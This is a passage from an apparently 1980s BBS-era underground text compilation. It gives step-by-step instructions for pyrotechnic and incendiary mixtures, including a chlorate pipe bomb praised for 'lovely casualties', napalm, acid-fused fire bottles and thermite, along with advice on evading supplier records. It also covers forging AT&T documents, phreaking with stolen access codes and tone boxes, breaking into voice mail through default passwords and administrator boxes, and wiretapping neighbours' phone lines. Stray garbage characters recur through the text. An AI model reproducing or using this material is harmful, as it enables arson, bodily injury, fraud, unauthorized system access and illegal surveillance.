  2290.  
  2291.  
  2292. Golden Twinkler Stars - Falls through the air and burns in an on and off
  2293.   manner. The effect is spectacular. A pumped or cut star.
  2294.  
  2295. Potassium Nitrate     18
  2296. Sulfur                3
  2297. Lampblack             3
  2298. Aluminum Powder       3
  2299. Antimony Sulfide      3
  2300. Sodium Oxalate        4
  2301. Dextrine              2
  2302. Bind with water
  2303.  
  2304. Zinc Spreader Stars - Shoot out pieces of burning zinc and charcoal. These
  2305.   stars are much heavier than usual, and require larger charges if they're to
  2306.   be fired from a tube.
  2307.  
  2308. Zinc Dust             72
  2309. Potassium Chlorate    15
  2310. Potassium Dichromate  12
  2311. Granular Charcoal     12  ∩7Å3 
  2312. èDextrine               2
  2313. bind with water
  2314.  
  2315. Electric Stars - Stars that contain aluminum powder
  2316.  
  2317. Potassium Nitrate     15        Potassium Chlorate    60
  2318. Aluminum, fine        2         Barium Nitrate        5
  2319. Aluminum, medium      1         Aluminum, fine        9
  2320. Black Powder          2         Aluminum, medium      4
  2321. Antimony Sulfide      3         Aluminum, coarse      3
  2322. Sulfur                4         Charcoal              2
  2323. bind with dextrine in           Dextrin               5
  2324. water                           bind with red gum in
  2325.                                 water
  2326. Potassium Perchlorate 6
  2327. Barium Nitrate        1         Potassium Perchlorate 4
  2328. Aluminum              20        Aluminum, medium      2
  2329. Dextrin               1         Dextrin               1
  2330. bind with shellac in            bind with shellac in alcohol
  2331. alcohol
  2332.  
  2333.  
  2334. Simpler Zinc Spreaders
  2335.  
  2336. Potassium Nitrate     14        Potassium Chlorate    5
  2337. Zinc Dust             40        Potassium Dichromate  4
  2338. Charcoal              7         Charcoal, medium      4
  2339. Sulfur                4         Zinc Dust             24
  2340. bind with dextrine in           bind with dextrine in water
  2341. water
  2342.  
  2343.  
  2344. Willow Tree Stars - Use large amounts of lampblack -- too much to burn fully.
  2345.   Gives a willow tree effect.
  2346.  
  2347. Potassium Chlorate    10
  2348. Potassium Nitrate     5
  2349. Sulfur                1
  2350. Lampblack             18
  2351. bind with dextrine in water
  2352.  
  2353. In future files, we'll look at using these mixtures to produce roman candles,
  2354. aerial bombs, and other effects. As always, don't forget that it's just plain
  2355. stupid to go buying all these materials from one chemical supply house. When
  2356. you buy it all as a group, they know what you plan to do with it, and they keep
  2357. records. If anyone goes investigating the source of homemade fireworks and
  2358. checks with your supplier, there will be a lead straight to you. Be sure to
  2359. cover your tracks.
  2360.  
  2361.  
  2362.  
  2363.                                  AT&T FORGERY
  2364.  
  2365. Here is a very simple way to either:
  2366.   ∩7Å3 
  2367. è[1] Play an incredibly cruel and realistic joke on a phreaking end.
  2368.                                      -OR-
  2369. [2] Provide yourself with everything you ever wanted to be an AT&T person.
  2370.  
  2371.    All you need to do is get your hands on some AT&T paper and/or business
  2372. cards.  To do this you can either go down to your local business office and
  2373. swipe a few or call up somewhere like WATTS INFORMATION and ask them to send
  2374. you their information package. They will send you:
  2375. 1. A nice letter (with the AT&T logo letterhead) saying "Here is the info."
  2376. 2. A business card (again with AT&T) saying who the sales representative is.
  2377. 3. A very nice color booklet telling you all about WATTS lines.
  2378. 4. Various billing information. (Discard as it is very worthless)
  2379.  
  2380.    Now take the piece of AT&T paper and the AT&T business card down to your
  2381. local print/copy shop.  Tell them to run you off several copies of each, but
  2382. to leave out whatever else is printed on the business card/letter.  If they
  2383. refuse or ask why, take your precious business elsewhere.
  2384. (This should only cost you around $2.00 total)
  2385.  
  2386.    Now take the copies home and either with your typewriter, MAC, or Fontrix,
  2387. add whatever name, address, telephone number, etc. you like. (I would
  2388. recommend just changing the name on the card and using whatever information
  2389. was on there earlier)
  2390.  
  2391.    And there you have official AT&T letters and business cards.  As mentioned
  2392. earlier, you can use them in several ways.  Mail a nice letter to someone you
  2393. hate (on AT&T paper..hehehe) saying that AT&T is onto them or something like
  2394. that.  (Be sure to use correct English and spelling)  (Also do not hand write
  2395. the letter!  Use a typewriter! - Not Fontrix as AT&T doesn't use OLD ENGLISH
  2396. or ASCII BOLD when they type letters.  Any IBM typewriter will do perfectly)
  2397.  
  2398.    Another possible use (of many, I guess) is (if you are old enough to look
  2399. the part) to use the business card as some sort of fake id.
  2400.  
  2401.    The last example of uses for the fake AT&T letters & b.cards is mentioned
  2402. in my textfile, BASIC RADIO CALLING.  Briefly, send the station a letter that
  2403. reads:
  2404.     WCAT - FM202: (Like my examples? Haha!)
  2405. (As you probably know, radio stations give away things by accepting the 'x'
  2406. call. (ie: The tenth caller through wins a pair of Van Halen tickets)
  2407. Sometimes they may ask a trivia question, but that's your problem. Anyway, the
  2408. letter continues:)
  2409.   (You basically say that they have become so popular that they are getting
  2410. too many calls at once from listeners trying to win tickets. By asking them
  2411. to call all at the same time is overloading our systems.  We do, of course,
  2412. have means of handling these sort of matters, but it would require you sending
  2413. us a schedule of when you will be asking your listeners to call in.  That way
  2414. we would be able to set our systems to handle the amount of callers you get at
  2415. peak times..(etc..etc..more BS..But you get the idea, right?)
  2416.  
  2417.  
  2418.  
  2419.  
  2420.                               The Hacker's Handbook
  2421. [ Definitions ]  ∩7Å3 
  2422. è
  2423. Phreak    ["free"k]  Verb--1. The act of "Phreaking"  2. The act of making
  2424.        telephone calls without paying money [Slang]
  2425.  
  2426. Phreaker  ["free"-k-er]  Noun--1. One who engages in the act of "Phreaking"
  2427.        2. One who makes telephone calls without paying money [Slang]
  2428.  
  2429. <%=-------------------------------------------------------------------------=%>
  2430.  
  2431. [ Introduction ]
  2432.  
  2433.      Phreaking is a method used by most intelligent people {most often those
  2434. who use a computer and a Modulator-Demodulator (MoDem)}.  If you happen to
  2435. resemble the major mass of people who do not have the income to afford large
  2436. phone bills then phreaking is for you.  If you live in an area with an
  2437. Electronic Switching System [ESS] then phreaking is something which should be
  2438. done in moderate amounts.
  2439.  
  2440. <%=-------------------------------------------------------------------------=%>
  2441.  
  2442. [ Switching Systems ]
  2443.  
  2444. Three types of switching systems are present in the United States today:
  2445.  
  2446.                [1] Step by Step
  2447.                [2] Crossbar
  2448.                [3] ESS  {Electronic Switching System}
  2449.  
  2450.  
  2451.                          <] Step by Step [>
  2452.  
  2453. First switching system used in America, adopted in 1918 and until 1978 Bell
  2454. had over 53% of all exchanges using Step by Step [SxS].  A long, and con-
  2455. fusing train of switches is used for SxS switching.
  2456.  
  2457.                          [> Disadvantages <]
  2458.    [A] The switch train may become jammed : Blocking call.
  2459.    [B] No DTMF [Dual-Tone Multi-Frequency]["Touch-tone"].
  2460.    [C] Much maintenance and much electricity.
  2461.    [D] Everything is hard wired
  2462.  
  2463.                         +> Identification <+
  2464.    [A] No pulsing digits after dialing or DTMF.
  2465.    [B] Phone Company sounds like many typewriters.
  2466.    [C] No:  Speed calling, Call forwarding, and other services.
  2467.    [D] Pay-phone wants money first before dial-tone.
  2468.  
  2469.  
  2470.                            <] Crossbar [>
  2471.  
  2472. Crossbar has been Bell's primary switcher after 1960.  Three types of Crossbar
  2473. switching exist:  Number 1 Crossbar [1XB], Number 4 Crossbar [4XB], and Number
  2474. 5 Crossbar [5XB].  A switching matrix is used for all the phones in an area.
  2475. When someone calls, the route is determined and is met up with the other phone.
  2476. The matrix is set-up in horizontal and vertical paths.  There are no definite  ∩7Å3 
  2477. èdistinguishing features of Crossbar switching.
  2478.  
  2479.  
  2480.                               <] ESS [>
  2481.  
  2482. You probably were hoping I wouldn't talk about this nightmare, if you did you
  2483. will know why everyone doesn't want to be reminded about Bell's holocaust on
  2484. America.  With ESS Bell knows:  every digit dialed {including mistakes!}, who
  2485. you call, when you called, how long you were connected, and in some cases,
  2486. what you talked about!  Yes, this is the closest anyone has come to true
  2487. Totalitarianism.  ESS is programed to print out the numbers of people who make
  2488. excessive calls to WATS numbers [Wide Area Telephone Service][1-800 numbers]
  2489. or directory assistance.  This deadly trap is called "800 Exceptional Calling
  2490. Report."  ESS can be programed to print logs of who called certain numbers.
  2491. Electronic Switching System makes the job of the FBI, Bell Security {The
  2492. Gestapo in phreakin' tongue}, NSA, and other organizations which like to invade
  2493. our privacy, extremely easy!  Tracing is done in microseconds, and the results
  2494. are printed out on the monitor of a Gestapo officer.  ESS can also pick up
  2495. foreign tones on the line, like 2600 Hz. {used in blue boxes, discussed later}.
  2496. Bell claims that the entire country will be plagued by ESS by the 1990's!
  2497.  
  2498.                            +> Identification <+
  2499.    [A] Dialing 911 for emergencies.
  2500.    [B] Dial-tone first for pay-phones.
  2501.    [C] Calling services, like:  Call forwarding, Speed dialing, Call waiting.
  2502.    [D] ANI [Automatic Number Identification] for long-distance calls.
  2503.  
  2504.  
  2505. [[[Note]]]  of the above identifications of the three switching systems, do
  2506.             not solely rely on these descriptions, the best way to find out
  2507.             is to [no!] call your local telephone company.
  2508.  
  2509. <%=-------------------------------------------------------------------------=%>
  2510.  
  2511. [ Long-Distance Services ]
  2512.  
  2513. To attempt to help the community {and for private business} companies developed
  2514. ways to lessen the costs of long-distance calling charges.  The companies own
  2515. their own switching systems and use extenders for callers to call.  The way
  2516. extenders operate:  1] Customer calls service, 2] He/she hears a low tone which
  2517. sounds like a dial-tone, 3] She/he either dials the access code then the phone
  2518. number, or dials the phone number then the access code, 4] Is connected to
  2519. whatever he/she calls.  Aside from Ma Bells collection, the customer receives a
  2520. bill for calls made with his/her long-distance company {a supposedly cheaper
  2521. bill than Ma Bell's}.  Thought:  Hey, I could randomly pick access codes and
  2522. use them to call whatever area the company services!  Right, that's what basic
  2523. phreaking is!  A wise idea, though, is to have many access codes and many
  2524. service numbers to rotate throughout your average life as a phreaker.  To aid
  2525. in your quest to beat the system I have provided many 1-800 numbers which
  2526. anyone can call, aside from local numbers, such as Sprint, or MCI.  The reason
  2527. for providing you with WATS numbers is because all of us aren't in a big city
  2528. where Sprint or MCI even exist, this way everyone can phreak!  A way to find
  2529. more access codes is by using your old modem.  Yes, your modem can imitate DTMF
  2530. tones!
  2531.   ∩7Å3 
  2532. è  {>Procedure:  1)  dial 1-800  +  service number
  2533.                 2)  dial access code->area code->phone number, or
  2534.                 3)  dial area code->phone number->access code
  2535.  
  2536. [ Colored Boxes ]
  2537.  
  2538. A more shrewd, technological, safer {without ESS} way to phreak is with a piece
  2539. of hardware known as a ________ Box.  Boxes are many different colors {I don't
  2540. know ALL the colors because it seems like every time I turn around there's some
  2541. new color out!}.  Colors I have heard of:  Blue, Black, Red, White, Silver,
  2542. Clear, and MANY, MANY more...  Plans for making these boxes can be obtained by
  2543. calling different boards [BBS's], AE lines, or whatever.  But!, if you have an
  2544. Apple Cat modem then do I have good news for ->you<-!!  The Apple Cat modem
  2545. can emulate the frequencies {usually 2600 Hz.} made by ________ Boxes with the
  2546. help of a handy little program called "Cat's Meow!"
  2547.  
  2548. <%=-------------------------------------------------------------------------=%>
  2549.  
  2550.  
  2551.                           Hacking Voice Mail Systems
  2552.  
  2553. Voice Mail is a relatively new concept and not much has been said about it.
  2554. It is a very useful tool for the business person and the phreak.  The way it
  2555. works is that somebody wishing to get in touch with you calls a number,
  2556. usually a 1-800, and punches in on his touch-pad your mailbox number and then
  2557. he is able to leave a message for you.  Business experts report that this
  2558. almost totally eliminates telephone tag.  When a person wishes to pick up his
  2559. message all he needs to do is call the number enter a certain code and he can
  2560. hear his messages, transfer them, and do other misc. mailbox utilities.
  2561.  
  2562. Most VMSs are similar in the way they work.  There are a few different ways
  2563. the VMSs store the voice.  One way is that the voice is recorded digitally and
  2564. compressed and when heard it is reproduced back into the voice that recorded
  2565. it. Another method that is slower and uses more space, but costs less, stores
  2566. the voice on magnetic tape, the same type that is used to store data on a
  2567. computer, and then runs the tape at a slow speed.  Using this method the voice
  2568. does not need to be reproduced in any way and will sound normal as long as the
  2569. tape is running at a constant speed.  On some of the newer VMSs the voice is
  2570. digitally recorded and is transformed from the magnetic tape at about 2400
  2571. bits per second.
  2572.  
  2573. There are many different types and versions of voice mail systems.  Some of
  2574. the best and easiest to get on will be discussed.
  2575.  
  2576. Centagram
  2577. ---------
  2578. These are direct dial (you don't have to enter a box number).  To get on one
  2579. of these, first have a number to any box on the system.  All of the other
  2580. boxes will be on the same prefix; just start scanning them until you find one
  2581. that has a message saying that person you are calling is not available.  This
  2582. usually means that the box has not been assigned to anybody yet.  Before the
  2583. nice lady's voice tells you to leave the message, hit #.  You will then be
  2584. prompted for your password.  The password will usually be the same as the last
  2585. four digits of the box's number or a simple number like 1000, 2000, etc.  Once
  2586. you get on, they are very user friendly and will prompt you with a menu of  ∩7Å3 
  2587. èoptions.  If you can't find any empty boxes or want to do more, you can hack
  2588. but the system administrators box, which will usually be 9999 on the same
  2589. prefix as the other boxes, will allow you to hear anybody's messages and
  2590. create and delete boxes.
  2591.  
  2592. Sperry Link
  2593. -----------
  2594. These systems are very nice.  They will usually be found on an 800 number.
  2595. These are one of the hardest to get a box on because you must hack out a user
  2596. ID (different from the person's box number) and a password.  When it answers,
  2597. if it says, "This is a Sperry Link voice station.  Please enter your user ID,"
  2598. you will have to start trying to find a valid user ID.  On most Sperrys it
  2599. will be a five digit number.  If it answers and says, "This is an X answering
  2600. service," you first have to hit *# to get the user number prompt.  Once you
  2601. get a valid user number will have to guess the password on most systems, it
  2602. will be 4 digits.  Once you get in, these are also very user friendly and have
  2603. many different options available.
  2604.  
  2605. RSVP
  2606. ----
  2607. This is probably one of the worst VMSs but it is by far the easiest to get
  2608. yourself a box.  When it answers you can hit * for a directory of the boxes on
  2609. it (it will only hold 23).  If you hit # you will be given a menu of options
  2610. and when you choose an option you will then be prompted for your ID number.
  2611. The ID number on an RSVP system will just about always be the same as the
  2612. mailbox number, which are always only 2 digits.
  2613.  
  2614. A.S.P.E.N.
  2615. ----------
  2616. The Aspen voice message systems made by Octel Telecommunications is in my
  2617. opinion the BEST VMS made.  To get a box on an Aspen, you need to find an
  2618. empty box.  To find an empty box, scan the box numbers and if one says, "You
  2619. entered XXXX.  Please leave a message at the tone," then this is an empty box.
  2620. You next just press # and when prompted for your box number enter the number
  2621. of the empty box and friendly voice of the nice lady will guide you through
  2622. all of the steps of setting up your box.  She first tells you what you can do
  2623. with the box and then will prompt you with, "Please enter the temporary
  2624. password assigned to you by your system manager."  This password will usually
  2625. be 4 digits long and the same as the box number like 1000, etc.  Once you get
  2626. on their are many things you can do.  You can make a distribution list where
  2627. if you want to leave a certain message to more than one person, you can enter
  2628. the list number and all of the boxes on the list will get the message. You can
  2629. also have the system call you and notify you that you have new messages. These
  2630. systems also have what they call "Information center mailboxes" that are
  2631. listen only and can also have a password on them so the person calling has to
  2632. enter the password before he hears the greeting message.  Aspen VMSs have a
  2633. system managers mailbox that will just about give you total control of the
  2634. whole system and let you listen to people's mail, create and delete boxes, and
  2635. many other things.
  2636.  
  2637.  
  2638.  
  2639.                             IMPROVISED INCENDIARIES
  2640.  
  2641. 1) Chlorate-Sugar mix  ∩7Å3 
  2642. è
  2643.    This mixture can be either an incendiary or an explosive.  Sugar is the
  2644. common granulated household type.  Either potassium chlorate (KClO3) or sodium
  2645. chlorate (NaClO3) can be used; but potassium is potassium is preferred.
  2646. Proportions can be by equal parts or by volume, or 3 parts chlorate to 2 parts
  2647. sugar preferred.  Mix in or on a non-sparking surface.  Unconfined, the mixture
  2648. is an incendiary.  Confined in a tightly capped length of pipe, it will explode
  2649. when a spark is introduced.  Such a pipe will produce lovely casualties, but is
  2650. not very good for breaching of cutting up.  Concentrated sulfuric acid will
  2651. ignite this very fast burning incendiary mixture.  Placing the acid in a
  2652. gelatin capsule, balloon, or other suitable container will provide a delay,
  2653. (length of which depends on how long it takes for the acid to eat through the
  2654. container).
  2655.  
  2656. 2) Potassium Permanganate And Sugar
  2657.  
  2658.    Another fast burning, first fire mix is obtained by mixing potassium
  2659. permanganate, 9 parts, to one part sugar.  It is some what hotter than the
  2660. chlorate sugar mix, and can be ignited by the addition of a few drops of
  2661. glycerine.
  2662.  
  2663. 3) Improvised Napalm
  2664.  
  2665.    In talking about this, I have found that there are many ways to this
  2666. wonderful substance.  My favorite is by mixing gasoline and styrofoam.  Usually
  2667. in a metal can. Keep adding the styrofoam until the mix is very stinky, an then
  2668. add a little bit of kerosine. Another method is by taking a double boiler,
  2669. filling the bottom portion with approx 3/4 full of water. Put either gasoline
  2670. or kerosine into the top.  Add pure SOAP chips to the mix.  Heat the fuel until
  2671. it boils and then simmers. Stir constantly until the desired consistency is
  2672. reached: remember that it will thicken further on cooling. Last we come the
  2673. 'Soldier' technique, anyone who saw this movie will recognize this one.
  2674. Carefully heat the end of a 100 watt light bulb. again-carfully remove the
  2675. metal end and internal parts.  Fill the glass bulb with half gasoline. and then
  2676. 1/4 more with dish washing liquid.  Finally take rubber cement and glue the two
  2677. parts back together.  Be sure that you put enough mixture into the build so
  2678. that the metal wire is well submerged before use and during.
  2679.  
  2680. 4) Molded Bricks That Burn
  2681.  
  2682.    Proportions are 3 parts aluminum powder, 4 parts water and 5 parts plaster
  2683. of paris.  Mix the aluminum and plaster thoroughly together, then add the water
  2684. and stir vigorously. Pour the resulting mix into a mold, let harden, and then
  2685. dry for 2 to 3 weeks. These blocks are hard to ignite, and take a long time to
  2686. make, but when ignited on mild steal, they have a tendency to melt it.
  2687.  
  2688. 5) The Fire Bottle
  2689.  
  2690.   Fill a good Jack Daniel's bottle about one-fifth to one-fourth full with
  2691. sulfuric acid.  Fill the remainder with gasoline, kerosine, or a good
  2692. combination of the two and mix thoroughly.  Add water to Potassium Chlorate and
  2693. sugar mix, and soak rags in the mix.  Wrap the rags around the bottle, tie in
  2694. place, and allow to dry.  When thrown at a T-62 or other target, the bottle
  2695. will break, the acid will ignite the chlorate-sugar mix on the rags, which will
  2696. ignite the fuel.  ∩7Å3 
  2697. è
  2698. 6) Molotov Cocktails
  2699.  
  2700.   These do not 'explode' per say, they just spread around the fuel and, if your
  2701. lucky the oil/gas mix combusts enough to give you a little "boom".  A two to
  2702. one ratio of gas to oil works nicely.  Napalm can also be used, or jelly gas is
  2703. fine.
  2704.  
  2705. 7) Thermite
  2706.  
  2707.   Use any size can with sticks tied or taped to sides and cut a small hole in
  2708. the bottom. Cover bottom with paper.  Place round stick wrapped in paper in
  2709. middle of can.  Fill bottom of can 1/4 inch with magnesium. Over this place
  2710. mixture of 3 parts ferric oxide and 2 parts aluminum powder. Remove stick
  2711. (leaving paper tunnel) and fill hole with mixture 3 parts potassium chlorate
  2712. and 1 part sugar.  Top the hole with a paper bag containing chlorate-sugar mix
  2713. with fuse protruding Tamp top with dirt or clay.
  2714.  
  2715.  
  2716.             THE JOY OF "BOXING"
  2717.                BY THE DRAGYN
  2718.  
  2719.   I AM WRITTING THIS ARTICLE TO INFORM THOSE OF YOU THAT HAVE A BOX
  2720. AND ARE GETTING BORED WITH NOTHING TO DO OR IF YOU JUST AREN'T QUITE
  2721. SURE WHAT YOU ARE DOING WHEN YOU PLAY AROUND WITH MF TONES.  FIRST OF
  2722. ALL, WHEN YOU BLAST OUT THE 2600HZ TONE, YOU ARE DROP PING A TRUNK AND
  2723. ESSENTIALLY, YOU BECOME YOUR OWN OPERATOR.  WHEN YOU PLACE A LONG
  2724. DISTANCE PHONE CALL, A COMPUTER USUALLY DOES THE MF TONES FOR YOU AND
  2725. YOU DON'T HEAR THEM.  IN THIS ARTICLE, I WILL DEAL WITH INTERNATIONAL
  2726. CALLING, CONFERENCING, EMERGENCY-BREAK THROUGHS AND JUST HAVING FUN
  2727. WITH THE BOX.  BUT NOWDAYS, BOXING IS MUCH MORE RISKIER THAN IT WAS
  2728. BACK 10-15 YEARS AGO, SO IF YOU AREN'T CAUTIOUS OR YOU LIVE ON A
  2729. MODERN ESS, THAN YOU MIGHT JUST GET CAUGHT (BUT IF YOU'RE NOT 18 YET
  2730. THEN BIG DEAL!    GO RAG THE HELL OUT OF MA BELL!)
  2731.  
  2732.   HAVE YOU EVER WANTED TO CALL OVERSEAS AND TALK TO SOMEONE IN ANOTHER
  2733. COUNTRY?  OR ARE YOU JUST BORED OF METROFONE OR MCI?  THEN TRY THIS:
  2734. WHEN YOU PLACE AN INTERNATIONAL CALL, IT IS ROUTED THROUGH THE CLOSEST
  2735. OR CLOSEST UNBUSY INTERNATIONAL LINK.  YOU CAN FIND THESE LINKS BY
  2736. GOING KP-213-182-ST.  THIS IS THE LOS ANGLES LINK.  MOST MAJOR CITIES
  2737. HAVE THEM BY THE COAST LIKE NEW YORK KP-212-182-ST AND EVEN DENVER
  2738. KP-303-182-ST.    WHEN YOU CALL ONE OF THESE LINKS, YOU WILL GET A TONE,
  2739. SOMETIMES NOT, AND THEN YOU HAVE ABOUT 10 SECONDS TO ENTER THE NUMBER
  2740. YOU ARE DIALING IN MF TONES.  IF YOU MAKE A MISTAKE, IT WILL TELL YOU.
  2741. THE NORMAL FORMAT FOR MAKING A CALL WOULD BE:  KP-212-182-ST (WAIT FOR
  2742. TONE) KP-( COUNTRY CODE)-(PHONE NUMBER IN COUNTRY) -ST THEN WAIT FOR
  2743. THE CALL TO GO THROUGH.
  2744.  
  2745.   THERE TWO WAYS TO DO CONFERENCE CALLS.  ONE IS TO MF UP
  2746. KP-213-080-1050- ST.  THIS GIVES YOU ALIANCE TELE-CONFERENCING IN LOS
  2747. ANGLES.  THE WAY THIS ONE WORKS IS YOU ENTER KP-2130801050-ST WAIT
  2748. TILL YOU HEAR IT DROP TWICE THEN YOU ENTER ANOTHER NUMBER THAT THE
  2749. CALL IS GOING TO BE BILLED TO (USUALLY SOME- ONE THAT YOU DON'T LIKE).
  2750. THIS ONE IS TOTALLY COMPUTER CONTROLLED AND YOU JUST ENTER THE INFO
  2751. NEEDED BY A NORMAL TOUCH TONE PAD.  THE OTHER WAY FOR CONFERENCING IS  ∩7Å3
  2752. èTO MF UP YOUR LOCAL OR NOT SO LOCAL CONFERENCE OPERATOR.  TO DO THIS
  2753. JUST DROP A TRUNK THEN GO KP-(AREA CODE)-11511-ST AND THE LADY WILL
  2754. ANSWER "CONFERENCE OPERATOR, CAN I HELP YOU?" NOW IF YOU WANTED TO
  2755. HOOK JUST 1-10 PEOPLE TOGETHER YOU GIVE HER THE PH#S AND SHE WILL DIAL
  2756. THEM UP AND PUT EVERYONE ON TOGETHER, MEANWHILE, SHE THINKS YOU ARE
  2757. THE OPERATOR SETTING IT UP FOR SOMEONE ELSE.  ONE NOTE, WHENEVER YOU
  2758. ARE DIALING IN MF TONES AND GET AN OPERATOR, THEY HAVE NO IDEA THAT
  2759. YOU ARE BOXING, THEY JUST THINK YOU ARE AN OPERATOR FROM SOMEWHERE OUT
  2760. OF TOWN.  SO DON'T BE SCARED, GIVE THOSE OPERATORS HELL!  IN FACT, IF
  2761. YOU CAN FIND A GOOD OPERATOR, THEY WILL EVEN TELL YOU HOW TO DO
  2762. THINGS.
  2763.  
  2764.   NOW DON'T YOU ALL HATE A BUSY SIGNAL?  EVER TRY TO GET TO SOMEONE
  2765. AND THE LINE WAS BUSY?    WELL, DON'T FRET ANYMORE!  LET'S SAY THAT THE
  2766. PHONE NUMBER 612-874-8700 WAS BUSY AND YOU WANTED TO GET THROUGH.
  2767. FIRST YOU WOULD DROP YOUR TRUNK THEN GO KP-612-121-ST.    THIS WILL GIVE
  2768. YOU A LOCAL OPERATOR IN THE 612 AREA CODE.  WHEN SHE ANSWERS (SHE
  2769. THINKS YOU ARE AN OPERATOR FROM SOME-WHERE ELSE CALLING) YOU SAY
  2770. "EMERGENCY INTERRUPTION ON AREA CODE 612-874-8700 AND THE PARTIES NAME
  2771. IS PETER (OR SOME DUMP NAME)." SINCE TRUNK VERIFICATION CANNOT BE DONE
  2772. BY OUTSIDE TOLL SWITCHING SYSTEMS, YOU CANNOT DO THESE BY BOXING AND
  2773. YOU HAVE TO LET THE OPERATOR DO THEM FOR YOU.  AGAIN, SHE HAS NO WAY
  2774. OF KNOWING THAT YOU AREN'T AN OPERATOR WHEN YOU CALL HER UNLESS YOU
  2775. ARE 12 YEARS OLD AND SOUND LIKE A SNIVELING LITTLE WIMP.  AFTER THE
  2776. OPERATOR HAS CLEARED THE LINE, YOU CAN DIAL IT AND I T WON'T BE BUSY.
  2777. IF IT IS OUT OF ORDER SHE MAY SAY IT IS ODD OR OFF THE HOOK.
  2778.  
  2779.   NOW LET'S SAY YOU JUST WANT TO MAKE AN ORDINARILY PHONE CALL OR CALL
  2780. AN 800 PH#.  AFTER YOU DROP YOUR TRUNK, JUST DO THIS KP-(AREA
  2781. CODE)-(PH#)-ST, AND NOTICE THAT NO '1' IS NEEDED.
  2782.  
  2783.   NOW, WHAT IF YOU HAVE A FRIEND WITH A PHONE IN HIS CAR?  WELL, YOU
  2784. JUST MF UP THE MOBILE OPERATOR BY GOING KP-(AREA CODE)-11521-ST.
  2785.  
  2786.   AGAIN, REMEMBER THAT WHENEVER YOU TALK TO ONE OF THE OPERATORS, THEY
  2787. HAVE NO WAY OF KNOWING WHETHER YOU ARE A REAL OPERATOR OR NOT SO GIVE
  2788. THEM HELL AND DON'T BE SCARED!  I GUESS THAT THIS IS ALL FOR NOW, BUT
  2789. IF YOU WOULD LIKE MORE INFORMATION, LEAVE E-MAIL BUT NO RUGGIES
  2790. PLEASE.
  2791.  
  2792.  
  2793.  
  2794.                              * PRIVATE AUDIENCE *
  2795.  
  2796.                   (A BASIC LESSON IN THE ART OF LISTENING IN)
  2797.  
  2798. Federal law:
  2799.   Section 605 of title 47 of the U.S code, forbids interception of
  2800. communication, or divulagance of intercepted communication except by persons
  2801. outlined in section 119 of title 18 (a portion of the Omnibus crime control and
  2802. safe streets act of 1968). This act states that "It shall not be unlawful under
  2803. this act for an operator of a switchboard, or an officer, employee, or agent of
  2804. any communication common carrier who's switching system is used in the  ∩7Å3
  2805. ètransmission of a wire communication to intercept or disclose intercepted
  2806. communication."
  2807.  
  2808.                                PART II: TAPPING
  2809.  
  2810. Everyone has at some time wanted to hear what a friend, the principal, the prom
  2811. queen, or a neighbor has to say on the phone. There are several easy ways to
  2812. tap into a phone line. None of the methods that I present will involve actually
  2813. entering the house. You can do everything from the backyard. I will discuss
  2814. four methods of tapping a line. They go in order of increasing difficulty.
  2815.  
  2816. 1. The "beige box": a beige box (or bud box) is actually better known as a
  2817. "lineman" phone. They are terribly simple to construct, and are basically the
  2818. easiest method to use. They consist of nothing more than a phone with the
  2819. modular plug that goes into the wall cut off, and two alligator clips attached
  2820. to the red and green wires. The way to use this box, is to venture into the
  2821. yard of the person you want to tap, and put it onto his line. This is best done
  2822. at the bell phone box that is usually next to the gas meter. It should only
  2823. have one screw holding it shut, and is very easily opened. Once you are in, you
  2824. should see 4 screws with wires attached to them. If the house has one line,
  2825. then clip the red lead to the first screw, and the green to the second. You are
  2826. then on the "tappee's" phone. You will hear any conversation going on. I
  2827. strongly recommend that you remove the speaker from the phone that you're using
  2828. so the "tappee" can't hear every sound you make. If the house has two lines,
  2829. then the second line is on screws three and four. If you connect everything
  2830. right, but you don't get on the line, then you probably have the wires
  2831. backward. Switch the red to the second screw and the green to the first. If no
  2832. conversation is going on, you may realize that you can't tap the phone very
  2833. well because you don't want to sit there all night, and if you are on the
  2834. phone, then the poor tappee can't dial out, and that could be bad...so.......
  2835. method two.
  2836.  
  2837. 2. The recorder: This method is probably the most widespread, and you still
  2838. don't have to be a genius to do it. There are LOTS of ways to tape
  2839. conversations. The two easiest are either to put a "telephone induction pickup"
  2840. (Radio Shack $1.99) on the beige box you were using, then plugging it into the
  2841. microphone jack of a small tape recorder, and leaving it on record. Or plugging
  2842. the recorder right into the line. This can be done by taking a walkman plug,
  2843. and cutting off the earphones, then pick one of the two earphone wires, and
  2844. strip it. There should be another wire inside the one you just stripped. Strip
  2845. that one too, and attach alligators to them. Then follow the beige box
  2846. instructions to tape the conversation. In order to save tape, you may want to
  2847. use a voice activated recorder (Radio Shack $59), or if your recorder has a
  2848. "remote" jack, you can get a "telephone recorder control" at Radio shack shack
  2849. for $19 that turns the recorder on when the phone is on, and off when the phone
  2850. is off. This little box plugs right into the wall (modularly of course), so it
  2851. is best NOT to remove the modular plug for it. Work around it if you can. If
  2852. not, then just do you best to get a good connection. When recording, it is good
  2853. to keep your recorder hidden from sight (in the Bell box if possible), but in a
  2854. place easy enough to change tapes from.
  2855.  
  2856. 3. The wireless microphone: this is the BUG. It transmits a signal from the
  2857. phone to the radio (FM band). You may remember Mr. Microphone (from Kaytel
  2858. fame); these wireless microphones are available from Radio Shack for $19. They
  2859. are easy to build and easy to hook up. There are so many different models, that  ∩7Å3 
  2860. èis is almost impossible to tell you exactly what to do. The most common thing
  2861. to do is to cut off the microphone element, and attach these two wires to
  2862. screws one and two. The line MIGHT, depending on the brand, be "permanently off
  2863. hook". This is bad, but by phucking around with it for a while, you should get
  2864. it working. There are two drawbacks to using this method. One, is that the poor
  2865. asshole who is getting his phone tapped might hear himself on "FM 88, the
  2866. principal connection". The second problem is the range. The store bought
  2867. transmitters have a VERY short range. I suggest that you build the customized
  2868. version I will present in part four (it's cheaper too). Now on to the best of
  2869. all the methods....
  2870.  
  2871. 4. The "easy-talks": This method combines all the best aspects of all the the
  2872. other methods. It only has one drawback... You need a set of "Easy-talk" walkie
  2873. talkies. They are voice activated, and cost about $59. You can find 'em at toy
  2874. stores, and "hi-tech" catalogs. I think t(at any voice activated walkie talkies
  2875. will work, but I have only tried the easy-talks. First, you have to decide on
  2876. one for the "transmitter" and one for the "receiver". It is best to use the one
  2877. with the strongest transmission to transmit, even though it may receive better
  2878. also. De-solder the speaker of the "transmitter", and the microphone of the
  2879. "receiver". Now, go to the box. put the walkie talkie on "VOX" and hook the
  2880. microphone leads (as in method three) to the first and second screws in the
  2881. box. Now go home, and listen on your walkie talkie. If nothing happens, then
  2882. the phone signal wasn't strong enough to "activate" the transmission. If this
  2883. happens, there are two things you can do. One, add some ground lines to the
  2884. microphone plugs. This is the most inconspicuous, but if it doesn't work then
